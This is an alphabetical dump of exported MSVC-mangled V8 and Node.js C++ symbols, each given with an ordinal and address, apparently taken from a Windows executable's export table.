                                  ?EnableCpuFeature@AssemblerBase@internal@v8@@QEAAXW4CpuFeature@23@@Z46760x140436190
                                  ?EnableInlineAllocation@Heap@internal@v8@@QEAAXXZ46770x14092dbe0
                                  ?EnableInterrupts@StackGuard@internal@v8@@AEAAXXZ46780x14096c880
                                  ?EnableIteration@IdentityMapBase@internal@v8@@IEAAXXZ46790x1405f3280
                                  ?EnableLogging@CpuProfiler@internal@v8@@AEAAXXZ46800x1406e7940
                                  ?EnableMemorySavingsMode@Isolate@internal@v8@@QEAAXXZ46810x1404224c0
                                  ?EnableMemorySavingsMode@Isolate@v8@@QEAAXXZ46820x1404224c0
                                  ?EnableScriptAndEval@CompilationCache@internal@v8@@QEAAXXZ46830x1409f7880
                                  ?EnableWebAssemblyTrapHandler@V8@v8@@SA_N_N@Z46840x140a83140
                                  ?Enabled@GCIdleTimeHandler@internal@v8@@QEAA_NXZ46850x1409431c0
                                  ?Enabled@OptimizingCompileDispatcher@internal@v8@@SA_NXZ46860x1406220f0
                                  ?Enabled@StatsCounterThreadSafe@internal@v8@@QEAA_NXZ46870x140077c50
                                  ?Encode@Utf8@unibrow@@SAIPEADIH_N@Z46880x1405f9980
                                  ?Encode@node@@YA?AV?$Local@VValue@v8@@@v8@@PEAVIsolate@3@PEBD_KW4encoding@1@@Z46890x14024b0f0
                                  ?Encode@node@@YA?AV?$Local@VValue@v8@@@v8@@PEAVIsolate@3@PEBG_K@Z46900x14024b160
                                  ?EncodeOneByte@Utf8@unibrow@@SAIPEADE@Z46910x1405f9a90
                                  ?End@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@_K@Z46920x140e0a210
                                  ?End@LiveRange@compiler@internal@v8@@QEBA?AVLifetimePosition@234@XZ46930x140e801d0
                                  ?EndArray@TracedValue@tracing@v8@@QEAAXXZ46940x1400c8c50
                                  ?EndBlock@InstructionScheduler@compiler@internal@v8@@QEAAXVRpoNumber@234@@Z46950x140ea5040
                                  ?EndBlock@InstructionSelector@compiler@internal@v8@@QEAAXVRpoNumber@234@@Z46960x140e36f60
                                  ?EndBlock@InstructionSequence@compiler@internal@v8@@QEAAXVRpoNumber@234@@Z46970x140e04800
                                  ?EndCatch@TryCatchBuilder@interpreter@internal@v8@@QEAAXXZ46980x14086ccf0
                                  ?EndDictionary@TracedValue@tracing@v8@@QEAAXXZ46990x1400c8cb0
                                  ?EndFinally@TryFinallyBuilder@interpreter@internal@v8@@QEAAXXZ47000x1400768e0
                                  ?EndOffset@BlockData@Coverage@debug@v8@@QEBAHXZ47010x1402fec50
                                  ?EndOffset@FunctionData@Coverage@debug@v8@@QEBAHXZ47020x1402fec50
                                  ?EndPosition@SharedFunctionInfo@internal@v8@@QEBAHXZ47030x1407747b0
                                  ?EndTry@TryCatchBuilder@interpreter@internal@v8@@QEAAXXZ47040x14086cd00
                                  ?EndTry@TryFinallyBuilder@interpreter@internal@v8@@QEAAXXZ47050x14086cd70
                                  ?EnforceFlagImplications@FlagList@internal@v8@@SAXXZ47060x140968320
                                  ?Enqueue@CompilerDispatcher@internal@v8@@QEAA?AV?$Optional@_K@base@3@PEBVParseInfo@23@PEBVAstRawString@23@PEBVFunctionLiteral@23@@Z47070x1409d6020
                                  ?Enqueue@ControlFlowOptimizer@compiler@internal@v8@@AEAAXPEAVNode@234@@Z47080x140f10aa0
                                  ?Enqueue@ProfilerEventsProcessor@internal@v8@@QEAAXAEBVCodeEventsContainer@23@@Z47090x1406e7b40
                                  ?EnqueueMicrotask@Isolate@v8@@QEAAXP6AXPEAX@Z0@Z47100x140a83150
                                  ?EnqueueMicrotask@Isolate@v8@@QEAAXV?$Local@VFunction@v8@@@2@@Z47110x140a83170
                                  ?EnqueueMicrotask@MicrotaskQueue@internal@v8@@QEAAXVMicrotask@23@@Z47120x14096f420
                                  ?EnqueueMicrotask@MicrotaskQueue@internal@v8@@UEAAXPEAVIsolate@3@P6AXPEAX@Z1@Z47130x14096f480
                                  ?EnqueueMicrotask@MicrotaskQueue@internal@v8@@UEAAXPEAVIsolate@3@V?$Local@VFunction@v8@@@3@@Z47140x14096f570
                                  ?EnqueueNode@ProfileTree@internal@v8@@QEAAXPEBVProfileNode@23@@Z47150x1406cc9c0
                                  ?EnsureAllRegistersAreFlushed@BytecodeRegisterOptimizer@interpreter@internal@v8@@QEBA_NXZ47160x140870ef0
                                  ?EnsureAllocation@NewSpace@internal@v8@@AEAA_NHW4AllocationAlignment@23@@Z47170x1408d2440
                                  ?EnsureArrayOfSize@FeedbackNexus@internal@v8@@QEAA?AV?$Handle@VWeakFixedArray@internal@v8@@@23@H@Z47180x1407f6ed0
                                  ?EnsureBlackAllocated@IncrementalMarking@internal@v8@@QEAAX_K0@Z47190x140921130
                                  ?EnsureBlock@RawMachineAssembler@compiler@internal@v8@@AEAAPEAVBasicBlock@234@PEAVRawMachineLabel@234@@Z47200x140ee20c0
                                  ?EnsureBreakInfo@Debug@internal@v8@@QEAA_NV?$Handle@VSharedFunctionInfo@internal@v8@@@23@@Z47210x1409bf850
                                  ?EnsureCFGWellFormedness@Schedule@compiler@internal@v8@@AEAAXXZ47220x140e42b10
                                  ?EnsureCapacity@Bignum@internal@v8@@AEAAXH@Z47230x140840920
                                  ?EnsureCapacity@LayoutDescriptor@internal@v8@@CA?AV?$Handle@VLayoutDescriptor@internal@v8@@@23@PEAVIsolate@23@V423@H@Z47240x1407a1ef0
                                  ?EnsureCapacityForDeserialization@StringTable@internal@v8@@SAXPEAVIsolate@23@H@Z47250x140774860
                                  ?EnsureChunk@TypedSlots@internal@v8@@IEAAPEAUChunk@123@XZ47260x1408d8550
                                  ?EnsureConsoleOutputWin32@base@v8@@YAXXZ47270x140dc0840
                                  ?EnsureDecodedOffsets@AsmJsOffsetInformation@wasm@internal@v8@@AEAAXXZ47280x1405279e0
                                  ?EnsureDescriptorSlack@Map@internal@v8@@SAXPEAVIsolate@23@V?$Handle@VMap@internal@v8@@@23@H@Z47290x140791950
                                  ?EnsureExtraArrayOfSize@FeedbackNexus@internal@v8@@QEAA?AV?$Handle@VWeakFixedArray@internal@v8@@@23@H@Z47300x1407f6fe0
                                  ?EnsureFeedbackVector@JSFunction@internal@v8@@SAXV?$Handle@VJSFunction@internal@v8@@@23@@Z47310x1407b4d80
                                  ?EnsureGrowable@?$OrderedHashTable@VOrderedHashMap@internal@v8@@$01@internal@v8@@SA?AV?$MaybeHandle@VOrderedHashMap@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VOrderedHashMap@internal@v8@@@23@@Z47320x14075ef10
                                  ?EnsureGrowable@?$OrderedHashTable@VOrderedHashSet@internal@v8@@$00@internal@v8@@SA?AV?$MaybeHandle@VOrderedHashSet@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VOrderedHashSet@internal@v8@@@23@@Z47330x14075ef80
                                  ?EnsureHasFullTransitionArray@TransitionsAccessor@internal@v8@@AEAAXXZ47340x140743320
                                  ?EnsureHasInitialMap@JSFunction@internal@v8@@SAXV?$Handle@VJSFunction@internal@v8@@@23@@Z47350x1407b4f50
                                  ?EnsureIndirectFunctionTableWithMinimumSize@WasmInstanceObject@internal@v8@@SA_NV?$Handle@VWasmInstanceObject@internal@v8@@@23@HI@Z47360x14051f500
                                  ?EnsureInterval@TopLevelLiveRange@compiler@internal@v8@@QEAAXVLifetimePosition@234@0PEAVZone@34@_N@Z47370x140ef64e0
                                  ?EnsureLinearAllocationArea@PagedSpace@internal@v8@@IEAA_NHW4AllocationOrigin@23@@Z47380x14041add0
                                  ?EnsureRareData@ClassScope@internal@v8@@AEAAPEAURareData@123@XZ47390x140641870
                                  ?EnsureRareData@DeclarationScope@internal@v8@@AEAAPEAURareData@123@XZ47400x140641900
                                  ?EnsureReturnSlots@Frame@compiler@internal@v8@@QEAAXH@Z47410x140453820
                                  ?EnsureSourcePositionsAvailable@FrameSummary@internal@v8@@QEAAXXZ47420x1409894d0
                                  ?EnsureSplitEdgeForm@Schedule@compiler@internal@v8@@AEAAXPEAVBasicBlock@234@@Z47430x1400768e0
                                  ?EnsureSweepingCompleted@MarkCompactCollector@internal@v8@@QEAAXXZ47440x140907740
                                  ?EnsureSweptAndRetryAllocation@PagedSpace@internal@v8@@IEAA_NHW4AllocationOrigin@23@@Z47450x1408d2780
                                  ?EnsureUnmappingCompleted@Unmapper@MemoryAllocator@internal@v8@@QEAAXXZ47460x1408d27f0
                                  ?EnsureValid@iterator@StateValuesAccess@compiler@internal@v8@@AEAAXXZ47470x140ea8190
                                  ?EnsureWritableFastElements@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ47480x140ebe540
                                  ?Enter@Context@v8@@QEAAXXZ47490x140a834d0
                                  ?Enter@Isolate@internal@v8@@QEAAXXZ47500x14097d860
                                  ?Enter@Isolate@v8@@QEAAXXZ47510x140a83620
                                  ?Enter@RuntimeCallStats@internal@v8@@QEAAXPEAVRuntimeCallTimer@23@W4RuntimeCallCounterId@23@@Z47520x140855700
                                  ?EnterApiExitFrame@MacroAssembler@internal@v8@@QEAAXH@Z47530x14049a260
                                  ?EnterExitFrame@MacroAssembler@internal@v8@@QEAAXH_NW4Type@StackFrame@23@@Z47540x14049a2a0
                                  ?EnterExitFrameEpilogue@MacroAssembler@internal@v8@@AEAAXH_N@Z47550x14049a340
                                  ?EnterExitFramePrologue@MacroAssembler@internal@v8@@AEAAX_NW4Type@StackFrame@23@@Z47560x14049a520
                                  ?EnterFinalPause@LocalEmbedderHeapTracer@internal@v8@@QEAAXXZ47570x14095a180
                                  ?EnterFrame@TurboAssembler@internal@v8@@QEAAXW4Type@StackFrame@23@@Z47580x14049a630
                                  ?EnterFrame@TurboAssembler@internal@v8@@QEAAXW4Type@StackFrame@23@_N@Z47590x140422810
                                  ?EnterGlobalScope@AsmJsScanner@internal@v8@@QEAAXXZ47600x140a674f0
                                  ?EnterLocalScope@AsmJsScanner@internal@v8@@QEAAXXZ47610x140a67500
                                  ?Entries@ScriptData@TypeProfile@debug@v8@@QEBA?AV?$vector@VEntry@TypeProfile@debug@v8@@V?$allocator@VEntry@TypeProfile@debug@v8@@@std@@@std@@XZ47620x140a83630
                                  ?EntryAtIndex@IdentityMapBase@internal@v8@@IEBAPEAPEAXH@Z47630x1405f32b0
                                  ?EntryForProbe@?$HashTable@VCompilationCacheTable@internal@v8@@VCompilationCacheShape@23@@internal@v8@@AEAA?AVInternalIndex@23@VReadOnlyRoots@23@VObject@23@HV423@@Z47640x140774a00
                                  ?EntryForProbe@?$HashTable@VEphemeronHashTable@internal@v8@@VEphemeronHashTableShape@23@@internal@v8@@AEAA?AVInternalIndex@23@VReadOnlyRoots@23@VObject@23@HV423@@Z47650x140774a80
                                  ?EntryForProbe@?$HashTable@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@AEAA?AVInternalIndex@23@VReadOnlyRoots@23@VObject@23@HV423@@Z47660x140774b40
                                  ?EntryForProbe@?$HashTable@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@AEAA?AVInternalIndex@23@VReadOnlyRoots@23@VObject@23@HV423@@Z47670x140774bf0
                                  ?EntryForProbe@?$HashTable@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@AEAA?AVInternalIndex@23@VReadOnlyRoots@23@VObject@23@HV423@@Z47680x140774ca0
                                  ?EntryForProbe@?$HashTable@VObjectHashSet@internal@v8@@VObjectHashSetShape@23@@internal@v8@@AEAA?AVInternalIndex@23@VReadOnlyRoots@23@VObject@23@HV423@@Z47690x140774a80
                                  ?EntryForProbe@?$HashTable@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@AEAA?AVInternalIndex@23@VReadOnlyRoots@23@VObject@23@HV423@@Z47700x140774a80
                                  ?EntryForProbe@?$HashTable@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@AEAA?AVInternalIndex@23@VReadOnlyRoots@23@VObject@23@HV423@@Z47710x140774ca0
                                  ?EntryForProbe@?$HashTable@VStringSet@internal@v8@@VStringSetShape@23@@internal@v8@@AEAA?AVInternalIndex@23@VReadOnlyRoots@23@VObject@23@HV423@@Z47720x140774bf0
                                  ?EntryForProbe@?$HashTable@VStringTable@internal@v8@@VStringTableShape@23@@internal@v8@@AEAA?AVInternalIndex@23@VReadOnlyRoots@23@VObject@23@HV423@@Z47730x140774bf0
                                  ?EntryForVMState@ProfileGenerator@internal@v8@@AEAAPEAVCodeEntry@23@W4StateTag@3@@Z47740x1406d5730
                                  ?EntryFromBuiltinIndexAsOperand@TurboAssembler@internal@v8@@QEAA?AVOperand@23@VRegister@23@@Z47750x14049a690
                                  ?EntrySizeFromMode@HandlerTable@internal@v8@@CAHW4EncodingMode@123@@Z47760x1409e8500
                                  ?EntryToIndex@?$HashTable@VCompilationCacheTable@internal@v8@@VCompilationCacheShape@23@@internal@v8@@SAHVInternalIndex@23@@Z47770x140774d50
                                  ?EntryToIndex@?$HashTable@VEphemeronHashTable@internal@v8@@VEphemeronHashTableShape@23@@internal@v8@@SAHVInternalIndex@23@@Z47780x1404224d0
                                  ?EntryToIndex@?$HashTable@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@SAHVInternalIndex@23@@Z47790x1404224e0
                                  ?EntryToIndex@?$HashTable@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@SAHVInternalIndex@23@@Z47800x1404224f0
                                  ?EntryToIndex@?$HashTable@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@SAHVInternalIndex@23@@Z47810x140774d60
                                  ?EntryToIndex@?$HashTable@VObjectHashSet@internal@v8@@VObjectHashSetShape@23@@internal@v8@@SAHVInternalIndex@23@@Z47820x140422500
                                  ?EntryToIndex@?$HashTable@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@SAHVInternalIndex@23@@Z47830x1404224d0
                                  ?EntryToIndex@?$HashTable@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@SAHVInternalIndex@23@@Z47840x1404224d0
                                  ?EntryToIndex@?$HashTable@VStringSet@internal@v8@@VStringSetShape@23@@internal@v8@@SAHVInternalIndex@23@@Z47850x140422500
                                  ?EntryToIndex@?$HashTable@VStringTable@internal@v8@@VStringTableShape@23@@internal@v8@@SAHVInternalIndex@23@@Z47860x140422500
                                  ?EntryToIndex@?$OrderedHashTable@VOrderedHashMap@internal@v8@@$01@internal@v8@@QEAAHH@Z47870x14041c250
                                  ?EntryToIndex@?$OrderedHashTable@VOrderedHashSet@internal@v8@@$00@internal@v8@@QEAAHH@Z47880x14041c270
                                  ?EntryToValueIndex@?$ObjectHashTableBase@VEphemeronHashTable@internal@v8@@VEphemeronHashTableShape@23@@internal@v8@@SAHVInternalIndex@23@@Z47890x140422510
                                  ?EntryToValueIndex@?$ObjectHashTableBase@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@SAHVInternalIndex@23@@Z47900x140422510
                                  ?EphemeronHashTablePrint@EphemeronHashTable@internal@v8@@QEAAXAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@@Z47910x140997d60
                                  ?EphemeronKeyWriteBarrierFromCode@Heap@internal@v8@@SAX_K0PEAVIsolate@23@@Z47920x14092df20
                                  ?Epilogue@IncrementalMarking@internal@v8@@QEAAXXZ47930x1409212d0
                                  ?Equal@Bignum@internal@v8@@SA_NAEBV123@0@Z47940x140840940
                                  ?Equal@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4CompareOperationHint@34@@Z47950x140ead700
                                  ?Equals@BitVector@internal@v8@@QEBA_NAEBV123@@Z47960x140453840
                                  ?Equals@FieldType@internal@v8@@QEBA_NV123@@Z47970x1407f4ce0
                                  ?Equals@InstructionOperand@compiler@internal@v8@@QEBA_NAEBV1234@@Z47980x140453890
                                  ?Equals@NodeProperties@compiler@internal@v8@@SA_NPEAVNode@234@0@Z47990x140e44010
                                  ?Equals@Object@internal@v8@@SA?AV?$Maybe@_N@3@PEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@1@Z48000x140774d70
                                  ?Equals@Operator@compiler@internal@v8@@UEBA_NPEBV1234@@Z48010x14045a230
                                  ?Equals@Type@compiler@internal@v8@@QEBA_NV1234@@Z48020x14045a240
                                  ?Equals@Value@v8@@QEBA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@V?$Local@VValue@v8@@@2@@Z48030x140a83730
                                  ?EqualsCanonicalized@InstructionOperand@compiler@internal@v8@@QEBA_NAEBV1234@@Z48040x1404538a0
                                  ?EquivalentTime@DateCache@internal@v8@@QEAA_J_J@Z48050x140676690
                                  ?EquivalentYear@DateCache@internal@v8@@QEAAHH@Z48060x140676730
                                  ?ErrnoException@node@@YA?AV?$Local@VValue@v8@@@v8@@PEAVIsolate@3@HPEBD11@Z48070x140246f20
                                  ?Error@Exception@v8@@SA?AV?$Local@VValue@v8@@@2@V?$Local@VString@v8@@@2@@Z48080x140a83770
                                  ?Error@StreamingDecoder@wasm@internal@v8@@AEAA?AV?$unique_ptr@VDecodingState@StreamingDecoder@wasm@internal@v8@@U?$default_delete@VDecodingState@StreamingDecoder@wasm@internal@v8@@@std@@@std@@AEBVWasmError@234@@Z48090x140533fe0
                                  ?Error@StreamingDecoder@wasm@internal@v8@@AEAA?AV?$unique_ptr@VDecodingState@StreamingDecoder@wasm@internal@v8@@U?$default_delete@VDecodingState@StreamingDecoder@wasm@internal@v8@@@std@@@std@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@6@@Z48100x140534030
                                  ?ErrorLevel@Message@v8@@QEBAHXZ48110x140a83940
                                  ?Error_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ48120x140422520
                                  ?Error_string@OffThreadFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ48130x140727690
                                  ?Escape@EscapableHandleScope@v8@@AEAAPEA_KPEA_K@Z48140x140a83950
                                  ?EstimateLiftoffCodeSize@WasmCodeManager@wasm@internal@v8@@SA_KH@Z48150x140570930
                                  ?EstimateMarkingStepSize@GCIdleTimeHandler@internal@v8@@SA_KNN@Z48160x1409431d0
                                  ?EstimateNativeModuleCodeSize@WasmCodeManager@wasm@internal@v8@@SA_KHHH_N@Z48170x140570940
                                  ?EstimateNativeModuleCodeSize@WasmCodeManager@wasm@internal@v8@@SA_KPEBUWasmModule@234@_N@Z48180x1405709c0
                                  ?EstimateNativeModuleMetaDataSize@WasmCodeManager@wasm@internal@v8@@SA_KPEBUWasmModule@234@@Z48190x140570a60
                                  ?EstimateObjectsCount@V8HeapExplorer@internal@v8@@QEAAHXZ48200x1406db470
                                  ?Eternalize@V8@v8@@CAPEAVValue@2@PEAVIsolate@2@PEAV32@@Z48210x140a83a90
                                  ?EvalError_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ48220x140422530
                                  ?EvalError_string@OffThreadFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ48230x1407276a0
                                  ?Evaluate@Module@v8@@QEAA?AV?$MaybeLocal@VValue@v8@@@2@V?$Local@VContext@v8@@@2@@Z48240x140a83af0
                                  ?EvaluateGlobal@debug@v8@@YA?AV?$MaybeLocal@VValue@v8@@@2@PEAVIsolate@2@V?$Local@VString@v8@@@2@W4EvaluateGlobalMode@12@_N@Z48250x140a83fc0
                                  ?EventListener@ReasonEnum@Paused@API@Debugger@protocol@v8_inspector@@3PEBDEB48260x141cdcc50
                                  ?EvictFreeListItems@FreeList@internal@v8@@QEAA_KPEAVPage@23@@Z48270x1408d2810
                                  ?EvictMarkedCode@OSROptimizedCodeCache@internal@v8@@QEAAXPEAVIsolate@23@@Z48280x14075bc10
                                  ?Exception@ReasonEnum@Paused@API@Debugger@protocol@v8_inspector@@3PEBDEB48290x141cdcc58
                                  ?Exception@TryCatch@v8@@QEBA?AV?$Local@VValue@v8@@@2@XZ48300x140a84360
                                  ?ExceptionHandler@TurboAssembler@internal@v8@@QEAAXXZ48310x1400768e0
                                  ?Exec@RegExp@internal@v8@@SA?AV?$MaybeHandle@VObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VJSRegExp@internal@v8@@@23@V?$Handle@VString@internal@v8@@@23@HV?$Handle@VRegExpMatchInfo@internal@v8@@@23@@Z48320x1406a5c00
                                  ?Exec@RegExp@v8@@QEAA?AV?$MaybeLocal@VObject@v8@@@2@V?$Local@VContext@v8@@@2@V?$Local@VString@v8@@@2@@Z48330x140a84410
                                  ?Execute@JSToWasmWrapperCompilationUnit@wasm@internal@v8@@QEAAXXZ48340x1405aeab0
                                  ?Execute@NativeRegExpMacroAssembler@internal@v8@@SAHVString@23@HPEBE1PEAHHPEAVIsolate@23@VJSRegExp@23@@Z48350x1406b0f20
                                  ?ExecuteCompilation@WasmCompilationUnit@wasm@internal@v8@@QEAA?AUWasmCompilationResult@234@PEAVWasmEngine@234@PEAUCompilationEnv@234@AEBV?$shared_ptr@VWireBytesStorage@wasm@internal@v8@@@std@@PEAVCounters@34@PEAVWasmFeatures@234@@Z48360x1405aec80
                                  ?ExecuteFunctionCompilation@WasmCompilationUnit@wasm@internal@v8@@AEAA?AUWasmCompilationResult@234@PEAVWasmEngine@234@PEAUCompilationEnv@234@AEBV?$shared_ptr@VWireBytesStorage@wasm@internal@v8@@@std@@PEAVCounters@34@PEAVWasmFeatures@234@@Z48370x1405aee00
                                  ?ExecuteImportWrapperCompilation@WasmCompilationUnit@wasm@internal@v8@@AEAA?AUWasmCompilationResult@234@PEAVWasmEngine@234@PEAUCompilationEnv@234@@Z48380x1405af0f0
                                  ?ExecuteLiftoffCompilation@wasm@internal@v8@@YA?AUWasmCompilationResult@123@PEAVAccountingAllocator@23@PEAUCompilationEnv@123@AEBUFunctionBody@123@HW4ForDebugging@123@PEAVCounters@23@PEAVWasmFeatures@123@V?$Vector@H@23@PEAV?$unique_ptr@VDebugSideTable@wasm@internal@v8@@U?$default_delete@VDebugSideTable@wasm@internal@v8@@@std@@@std@@6@Z48390x1405d98b0
                                  ?Exit@Context@v8@@QEAAXXZ48400x140a84810
                                  ?Exit@Isolate@internal@v8@@QEAAXXZ48410x14097d930
                                  ?Exit@Isolate@v8@@QEAAXXZ48420x140a84900
                                  ?ExitProcess@OS@base@v8@@SAXH@Z48430x140dc0870
                                  ?Expand@PagedSpace@internal@v8@@IEAA_NXZ48440x1408d28d0
                                  ?Expand@RegExpBytecodeGenerator@internal@v8@@AEAAXXZ48450x1406ca0f0
                                  ?ExpandInternals@BitsetType@compiler@internal@v8@@SAII@Z48460x140e2ef70
                                  ?Expect@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAXW4Value@Token@23@@Z48470x1406fab30
                                  ?ExpectContextualKeyword@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAXPEBVAstRawString@23@PEBDH@Z48480x1406fab70
                                  ?ExpectSemicolon@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAXXZ48490x1406fac60
                                  ?ExpectedTransitionKey@TransitionsAccessor@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ48500x140422540
                                  ?ExpectedTransitionTarget@TransitionsAccessor@internal@v8@@QEAA?AV?$Handle@VMap@internal@v8@@@23@XZ48510x140422680
                                  ?Exponentiate@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ48520x140e0b390
                                  ?ExportForOptimization@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVGraph@234@XZ48530x140ee20f0
                                  ?ExportForTest@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVSchedule@234@XZ48540x140ee22b0
                                  ?ExportImportedFunction@WasmModuleBuilder@wasm@internal@v8@@QEAAXV?$Vector@$$CBD@34@H@Z48550x14052fa60
                                  ?ExportNativeModule@WasmEngine@wasm@internal@v8@@QEAA?AV?$shared_ptr@VNativeModule@wasm@internal@v8@@@std@@V?$Handle@VWasmModuleObject@internal@v8@@@34@@Z48560x14055e860
                                  ?ExpressionFromIdentifier@Parser@internal@v8@@AEAAPEAVVariableProxy@23@PEBVAstRawString@23@HW4InferName@23@@Z48570x1406fad00
                                  ?ExpressionFromLiteral@Parser@internal@v8@@AEAAPEAVExpression@23@W4Value@Token@23@H@Z48580x14072fbb0
                                  ?ExpressionFromPrivateName@Parser@internal@v8@@AEAAPEAVVariableProxy@23@PEAVPrivateNameScopeIterator@23@PEBVAstRawString@23@H@Z48590x1406fad50
                                  ?ExpressionListToExpression@Parser@internal@v8@@AEAAPEAVExpression@23@AEBV?$ScopedList@PEAVExpression@internal@v8@@PEAX@23@@Z48600x14072fd80
                                  ?Extend@HandleScope@internal@v8@@CAPEA_KPEAVIsolate@23@@Z48610x140964040
                                  ?ExtendTheAfterSegment@DateCache@internal@v8@@AEAAXHH@Z48620x1409d3860
                                  ?ExtendingNonExtensible@LookupIterator@internal@v8@@QEAA_NV?$Handle@VJSReceiver@internal@v8@@@23@@Z48630x140422730
                                  ?Extern@AsmType@wasm@internal@v8@@SAPEAV1234@XZ48640x140a63210
                                  ?ExternalAssemblerBuffer@internal@v8@@YA?AV?$unique_ptr@VAssemblerBuffer@internal@v8@@U?$default_delete@VAssemblerBuffer@internal@v8@@@std@@@std@@PEAXH@Z48650x1409faff0
                                  ?ExternalBackingStoreBytes@NewSpace@internal@v8@@QEAA_KXZ48660x140422770
                                  ?ExternalBackingStoreBytes@NewSpace@internal@v8@@UEBA_KW4ExternalBackingStoreType@23@@Z48670x1404227d0
                                  ?ExternalBackingStoreBytes@Space@internal@v8@@UEBA_KW4ExternalBackingStoreType@23@@Z48680x14041adf0
                                  ?ExternalConstant@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VExternalReference@internal@v8@@@34@VExternalReference@34@@Z48690x140e6bb70
                                  ?ExternalConstant@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBVExternalReference@34@@Z48700x140e0a5e0
                                  ?ExternalConstant@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@VExternalReference@34@@Z48710x140ec4450
                                  ?ExternalConstant@MachineGraph@compiler@internal@v8@@QEAAPEAVNode@234@VExternalReference@34@@Z48720x140ea6070
                                  ?ExternalConstant@MachineGraph@compiler@internal@v8@@QEAAPEAVNode@234@W4FunctionId@Runtime@34@@Z48730x140ea60d0
                                  ?ExternalConstant@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@VExternalReference@34@@Z48740x140e6bbc0
                                  ?ExternalPointer@Type@compiler@internal@v8@@SA?AV1234@XZ48750x14045a290
                                  ?ExternalReferenceAsOperand@TurboAssembler@internal@v8@@QEAA?AVOperand@23@VExternalReference@23@VRegister@23@@Z48760x14049a700
                                  ?Externalize@ArrayBuffer@v8@@QEAA?AVContents@12@XZ48770x140a849a0
                                  ?Externalize@ArrayBuffer@v8@@QEAAXAEBV?$shared_ptr@VBackingStore@v8@@@std@@@Z48780x140a849c0
                                  ?Externalize@SharedArrayBuffer@v8@@QEAA?AVContents@12@XZ48790x140a84a50
                                  ?Externalize@SharedArrayBuffer@v8@@QEAAXAEBV?$shared_ptr@VBackingStore@v8@@@std@@@Z48800x140a84a70
                                  ?ExtractAccessorInfoReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VAccessorInfo@23@@Z48810x1406db4d0
                                  ?ExtractAccessorPairProperty@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VName@23@VObject@23@H@Z48820x1406db590
                                  ?ExtractAccessorPairReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VAccessorPair@23@@Z48830x1406db670
                                  ?ExtractAllocationSiteReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VAllocationSite@23@@Z48840x1406db6d0
                                  ?ExtractArrayBoilerplateDescriptionReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VArrayBoilerplateDescription@23@@Z48850x1406db7a0
                                  ?ExtractCellReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VCell@23@@Z48860x1406db7d0
                                  ?ExtractCodeReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VCode@23@@Z48870x1406db800
                                  ?ExtractContextReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VContext@23@@Z48880x1406db960
                                  ?ExtractDescriptorArrayReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VDescriptorArray@23@@Z48890x1406dbc60
                                  ?ExtractElementReferences@V8HeapExplorer@internal@v8@@AEAAXVJSObject@23@PEAVHeapEntry@23@@Z48900x1406dbd50
                                  ?ExtractEphemeronHashTableReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VEphemeronHashTable@23@@Z48910x1406dbf00
                                  ?ExtractFeedbackCellReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VFeedbackCell@23@@Z48920x1406dc130
                                  ?ExtractFeedbackVectorReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VFeedbackVector@23@@Z48930x1406dc1c0
                                  ?ExtractFixedArrayReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VFixedArray@23@@Z48940x1406dc200
                                  ?ExtractInternalReferences@V8HeapExplorer@internal@v8@@AEAAXVJSObject@23@PEAVHeapEntry@23@@Z48950x1406dc280
                                  ?ExtractJSArrayBufferReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VJSArrayBuffer@23@@Z48960x1406dc390
